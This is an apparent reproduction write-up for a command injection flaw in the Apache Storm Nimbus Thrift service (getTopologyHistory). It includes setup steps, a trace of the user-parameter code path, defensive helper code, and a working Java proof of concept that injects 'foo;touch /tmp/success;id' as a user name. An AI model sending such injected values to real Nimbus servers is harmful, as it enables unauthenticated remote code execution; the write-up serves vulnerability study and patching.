Introduction

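Apache Storm is a free, open-source, distributed, highly fault-tolerant real-time computation system. Storm makes continuous stream processing easy and covers the real-time requirements that Hadoop's batch processing cannot meet. It is commonly used for real-time analytics, online machine learning, continuous computation, distributed RPC, ETL and similar workloads. Storm has two main kinds of components: Nimbus and Supervisor. Both are fail-fast and stateless. Job state, heartbeat information and similar data are kept in ZooKeeper, while submitted code resources are stored on the local disk of each machine.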

Vulnerability description

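This is a shell command injection vulnerability in the Nimbus Thrift server, located in the getTopologyHistory service. By sending a maliciously crafted Thrift request to the Nimbus server, an attacker can execute code remotely without any prior authentication.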

Affected versions

Apache Storm 2.2.x < 2.2.1

Apache Storm 2.1.x < 2.1.1

Apache Storm 1.x < 1.2.4
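The affected ranges above can be expressed as a small version check. The following is a hypothetical helper (the class and method names are made up for illustration) that assumes plain `major.minor.patch` version strings. It encodes only the three ranges listed here, so a version outside them (for example 2.0.x) is reported as "not in the listed range". That result does not mean the version is confirmed safe.

```java
/**
 * Hypothetical helper (not part of Storm): checks whether a version string
 * falls into one of the affected ranges listed in this article:
 * 2.2.x < 2.2.1, 2.1.x < 2.1.1, 1.x < 1.2.4.
 */
public class StormVersionCheck {

    // Parse "major.minor.patch" into three ints; missing parts default to 0.
    static int[] parse(String version) {
        String[] parts = version.trim().split("\\.");
        int[] v = new int[3];
        for (int i = 0; i < 3 && i < parts.length; i++) {
            // Drop any qualifier such as "-SNAPSHOT" after the digits.
            v[i] = Integer.parseInt(parts[i].replaceAll("[^0-9].*$", ""));
        }
        return v;
    }

    static boolean inListedAffectedRange(String version) {
        int[] v = parse(version);
        int major = v[0], minor = v[1], patch = v[2];
        if (major == 2 && minor == 2) return patch < 1;                    // 2.2.x < 2.2.1
        if (major == 2 && minor == 1) return patch < 1;                    // 2.1.x < 2.1.1
        if (major == 1) return minor < 2 || (minor == 2 && patch < 4);     // 1.x < 1.2.4
        return false; // not covered by the table above (e.g. 2.0.x)
    }

    public static void main(String[] args) {
        String[] versions = {"2.2.0", "2.2.1", "2.1.0", "1.2.3", "1.2.4", "2.0.0"};
        for (String v : versions) {
            System.out.println(v + " -> "
                + (inListedAffectedRange(v) ? "in listed affected range" : "not in listed range"));
        }
    }
}
```

The Storm 2.2.0 build used in this test falls in the first range.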

Environment setup

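Storm has to be deployed together with ZooKeeper, and it has to run on Linux, because this vulnerability only exists on Linux. The vulnerable code path looks up Unix groups by running a shell command.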

The Storm version used in this test is 2.2.0.

Setting up and starting ZooKeeper

After downloading, go into the /apache-zookeeper-3.7.0-bin/conf directory and run the following commands to start ZooKeeper:

```bash
cp zoo_sample.cfg zoo.cfg
cd ../bin
./zkServer.sh start
```

Setting up and starting Storm

After downloading, go into the /apache-storm-2.2.0/conf directory and edit the storm.yaml file.

Replace the IP addresses with the local machine's IP. The UI port can be set to any free port.

```yaml
storm.zookeeper.servers:
  - "192.168.23.129"
nimbus.seeds: ["192.168.23.129"]
ui.port: 8081
```

Then run the following commands to start Storm.

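Note: start ZooKeeper first, then run the Python scripts. Each command stays in the foreground, so run each one in its own terminal.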

```bash
cd ../bin
python3 storm.py nimbus
python3 storm.py supervisor
python3 storm.py ui
```



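Then open the UI port in a browser: 8081, as set by ui.port above (Storm's default is 8080). The UI page should come up.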

Next, submit a computation job (a Topology).

Create a Maven project and set the contents of pom.xml to:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>stormJob</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>

    <dependencies>
        <dependency>
            <groupId>org.apache.storm</groupId>
            <artifactId>storm-core</artifactId>
            <version>2.2.0</version>
            <!-- storm-core is already on the cluster's classpath at runtime -->
            <scope>provided</scope>
        </dependency>
    </dependencies>
</project>
```

Then create the class sum.ClusterSumStormTopology

with the following content:

```java
package sum;

import java.util.Map;

import org.apache.storm.Config;
import org.apache.storm.StormSubmitter;
import org.apache.storm.generated.AlreadyAliveException;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.generated.InvalidTopologyException;
import org.apache.storm.spout.SpoutOutputCollector;
import org.apache.storm.task.OutputCollector;
import org.apache.storm.task.TopologyContext;
import org.apache.storm.topology.OutputFieldsDeclarer;
import org.apache.storm.topology.TopologyBuilder;
import org.apache.storm.topology.base.BaseRichBolt;
import org.apache.storm.topology.base.BaseRichSpout;
import org.apache.storm.tuple.Fields;
import org.apache.storm.tuple.Tuple;
import org.apache.storm.tuple.Values;
import org.apache.storm.utils.Utils;

public class ClusterSumStormTopology {

    /**
     * A spout must extend BaseRichSpout.
     * It produces data and emits it downstream.
     */
    public static class DataSourceSpout extends BaseRichSpout {

        private SpoutOutputCollector collector;
        private int number = 0;

        /**
         * Initialization method; called only once before execution.
         * @param conf      configuration parameters
         * @param context   topology context
         * @param collector tuple emitter
         */
        @Override
        public void open(Map<String, Object> conf, TopologyContext context, SpoutOutputCollector collector) {
            this.collector = collector;
        }

        /**
         * Produces data; in production this usually comes from a message queue.
         */
        @Override
        public void nextTuple() {
            this.collector.emit(new Values(++number));
            System.out.println("spout emitted: " + number);
            Utils.sleep(1000);
        }

        /**
         * Declares the output fields.
         */
        @Override
        public void declareOutputFields(OutputFieldsDeclarer declarer) {
            // "num" corresponds to the value in new Values(...) emitted by nextTuple():
            // declare one field per emitted value. The bolt only needs to read "num".
            declarer.declare(new Fields("num"));
        }
    }

    /**
     * Bolt that keeps a running sum.
     * It receives tuples and processes them.
     */
    public static class SumBolt extends BaseRichBolt {

        private int sum = 0;

        /** Initialization method; executed only once. */
        @Override
        public void prepare(Map<String, Object> topoConf, TopologyContext context, OutputCollector collector) {
        }

        /** Receives the tuples sent by the spout. */
        @Override
        public void execute(Tuple input) {
            // "num" is the field name declared in the spout's declareOutputFields();
            // a value can be read either by index or by the upstream field name.
            Integer value = input.getIntegerByField("num");
            sum += value;
            System.out.println("Bolt:sum=" + sum);
        }

        /** This bolt emits nothing, so no output fields are declared. */
        @Override
        public void declareOutputFields(OutputFieldsDeclarer declarer) {
        }
    }

    public static void main(String[] args) {
        // TopologyBuilder builds a Topology from spouts and bolts.
        // Every Storm job is submitted as a Topology,
        // which specifies the order in which spouts and bolts run.
        TopologyBuilder tb = new TopologyBuilder();
        tb.setSpout("DataSourceSpout", new DataSourceSpout());
        // SumBolt receives data from DataSourceSpout via shuffle grouping.
        tb.setBolt("SumBolt", new SumBolt()).shuffleGrouping("DataSourceSpout");

        // Submit the topology to the Storm cluster.
        try {
            StormSubmitter.submitTopology("ClusterSumStormTopology", new Config(), tb.createTopology());
        } catch (AlreadyAliveException | InvalidTopologyException | AuthorizationException e) {
            e.printStackTrace();
        }
    }
}
```
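You can preview the output of this topology without a cluster. The class below is a hypothetical plain-Java simulation with no Storm dependency. It mimics the spout emitting 1, 2, 3, ... and the bolt adding each value to a running sum. It does not model the one-second sleep or Storm's scheduling.

```java
/**
 * Hypothetical simulation (no Storm classes) of the DataSourceSpout/SumBolt
 * logic above: the spout emits 1, 2, 3, ... and the bolt keeps a running sum.
 */
public class SumTopologySimulation {

    static int[] runningSums(int tuples) {
        int number = 0; // mirrors DataSourceSpout.number
        int sum = 0;    // mirrors SumBolt.sum
        int[] sums = new int[tuples];
        for (int i = 0; i < tuples; i++) {
            number++;        // nextTuple(): emit(new Values(++number))
            sum += number;   // execute(): sum += value
            sums[i] = sum;
        }
        return sums;
    }

    public static void main(String[] args) {
        for (int s : runningSums(5)) {
            System.out.println("Bolt:sum=" + s); // 1, 3, 6, 10, 15
        }
    }
}
```

On a real cluster, the same `Bolt:sum=` lines come from the worker process. They typically land in the worker logs, not in the terminal that submitted the jar.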

Finally, build the Maven project into a jar (for example with mvn package) and upload it to the Storm host.



Run the following commands in the /apache-storm-2.2.0/bin directory:

```bash
# Submit the topology (use the path to the uploaded jar)
python3 storm.py jar stormJob-1.0-SNAPSHOT.jar sum.ClusterSumStormTopology
# List the running topologies
python3 storm.py list
```

The deployment has succeeded when the following output appears.

Vulnerability analysis and reproduction

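Nimbus exposes a number of Thrift services on port 6627. By default, no authentication is configured, so an unauthenticated attacker can reach the vulnerable service and achieve RCE.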
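To audit a deployment for this missing-authentication condition, the sketch below inspects a configuration map for the `storm.thrift.transport` key, the same key used in the PoC. Two points are assumptions, both noted in the code: the class is hypothetical, and an absent key is treated as unauthenticated, following the statement above that no authentication is configured by default. Other configuration sources, such as defaults files or command-line overrides, are not modeled.

```java
import java.util.HashMap;
import java.util.Map;

// Hypothetical audit helper, not part of Storm.
public class NimbusAuthAudit {

    static final String TRANSPORT_KEY = "storm.thrift.transport";
    static final String SIMPLE_TRANSPORT = "org.apache.storm.security.auth.SimpleTransportPlugin";

    /**
     * Returns true if the Thrift transport is SimpleTransportPlugin (no authentication).
     * Assumption: a missing key means the unauthenticated default is in effect.
     */
    static boolean thriftIsUnauthenticated(Map<String, Object> conf) {
        Object transport = conf.getOrDefault(TRANSPORT_KEY, SIMPLE_TRANSPORT);
        return SIMPLE_TRANSPORT.equals(String.valueOf(transport).trim());
    }

    public static void main(String[] args) {
        Map<String, Object> conf = new HashMap<>();
        System.out.println("key absent: " + thriftIsUnauthenticated(conf));

        conf.put(TRANSPORT_KEY, SIMPLE_TRANSPORT);
        System.out.println("SimpleTransportPlugin: " + thriftIsUnauthenticated(conf));

        // Hypothetical placeholder for some authenticating transport plugin.
        conf.put(TRANSPORT_KEY, "com.example.SomeAuthTransportPlugin");
        System.out.println("other plugin: " + thriftIsUnauthenticated(conf));
    }
}
```

A `false` result only means that the no-authentication plugin is not selected. It does not verify that the chosen plugin is correctly configured.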

The stack trace of the request is as follows:

```
getGroupsForUserCommand:124, ShellUtils (org.apache.storm.utils)
getUnixGroups:110, ShellBasedGroupsMapping (org.apache.storm.security.auth)
getGroups:77, ShellBasedGroupsMapping (org.apache.storm.security.auth)
userGroups:2832, Nimbus (org.apache.storm.daemon.nimbus)
isUserPartOf:2845, Nimbus (org.apache.storm.daemon.nimbus)
getTopologyHistory:4607, Nimbus (org.apache.storm.daemon.nimbus)
getResult:4701, Nimbus$Processor$getTopologyHistory (org.apache.storm.generated)
getResult:4680, Nimbus$Processor$getTopologyHistory (org.apache.storm.generated)
process:38, ProcessFunction (org.apache.storm.thrift)
process:38, TBaseProcessor (org.apache.storm.thrift)
process:172, SimpleTransportPlugin$SimpleWrapProcessor (org.apache.storm.security.auth)
invoke:524, AbstractNonblockingServer$FrameBuffer (org.apache.storm.thrift.server)
run:18, Invocation (org.apache.storm.thrift.server)
runWorker:-1, ThreadPoolExecutor (java.util.concurrent)
run:-1, ThreadPoolExecutor$Worker (java.util.concurrent)
run:-1, Thread (java.lang)
```



An attacker can execute system commands by supplying a crafted user name, for example:

`user = "foo;touch /tmp/success;id"`



Follow the user parameter along the stack trace.

The user parameter is passed into isUserPartOf().





It is then passed to this.userGroups(user). Continue following it.

Through a ternary expression, user is passed to this.groupMapper.getGroups(user). Continue following it.



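user is passed to this.getUnixGroups(user). Continue following it.

user is passed to ShellUtils.getGroupsForUserCommand(user). Continue following it.

Finally, user is concatenated into a system command that is then executed. Because user is not filtered in any way, this results in command injection.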


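The last step of the trace can be modeled in a few lines. The class below is a simplified, hypothetical sketch, not Storm's actual `ShellUtils` source, and the official fix may differ. It contrasts two ways of building the command:

- A command string handed to `bash -c`, where a `;` in the user name starts a new command.
- An argument vector that runs `id` without a shell.

It also adds an allowlist check on the user name. The regex is an assumption. Deployments that use Kerberos principals or other name formats would need a broader pattern.

```java
import java.util.Arrays;
import java.util.regex.Pattern;

// Hypothetical sketch of the injection pattern; not Storm's real code.
public class GroupsCommandSketch {

    // Vulnerable shape: bash parses the whole string, so ';' in user starts a new command.
    static String[] vulnerableCommand(String user) {
        return new String[] {"bash", "-c", "id -Gn " + user};
    }

    // Safer shape: no shell; the user name is passed to `id` as one argv element.
    static String[] safeCommand(String user) {
        return new String[] {"id", "-Gn", user};
    }

    // Defence in depth: accept only conservative POSIX-style user names (assumed policy).
    private static final Pattern USER_NAME = Pattern.compile("^[a-z_][a-z0-9_-]{0,31}$");

    static boolean isPlausibleUserName(String user) {
        return user != null && USER_NAME.matcher(user).matches();
    }

    public static void main(String[] args) {
        String payload = "foo;touch /tmp/success;id";
        System.out.println(Arrays.toString(vulnerableCommand(payload)));
        System.out.println(Arrays.toString(safeCommand(payload)));
        System.out.println(isPlausibleUserName(payload));
    }
}
```

`main` prints the two command arrays and then `false`.

- In the first array, bash would split `id -Gn foo;touch /tmp/success;id` into three separate commands.
- In the second array, such as one passed to `ProcessBuilder`, `id` receives one odd-looking user name and fails to look it up.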

Test with the PoC by executing touch /tmp/success.

The command runs successfully and /tmp/success is created.

POC

```java
import org.apache.storm.thrift.TException;
import org.apache.storm.thrift.transport.TTransportException;
import org.apache.storm.utils.NimbusClient;

import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

public class Main {
    public static void main(String[] args) throws TException {
        HashMap config = new HashMap();
        List<String> seeds = new ArrayList<String>();
        seeds.add("localhost");
        config.put("storm.thrift.transport", "org.apache.storm.security.auth.SimpleTransportPlugin");
        config.put("storm.thrift.socket.timeout.ms", 60000);
        config.put("nimbus.seeds", seeds);
        config.put("storm.nimbus.retry.times", 5);
        config.put("storm.nimbus.retry.interval.millis", 2000);
        config.put("storm.nimbus.retry.intervalceiling.millis", 60000);
        config.put("nimbus.thrift.port", 6627);
        config.put("nimbus.thrift.max_buffer_size", 1048576);
        config.put("nimbus.thrift.threads", 64);
        NimbusClient nimbusClient = new NimbusClient(config, "localhost", 6627);

        // send attack
        nimbusClient.getClient().getTopologyHistory("foo;touch /tmp/success;id");
    }
}
```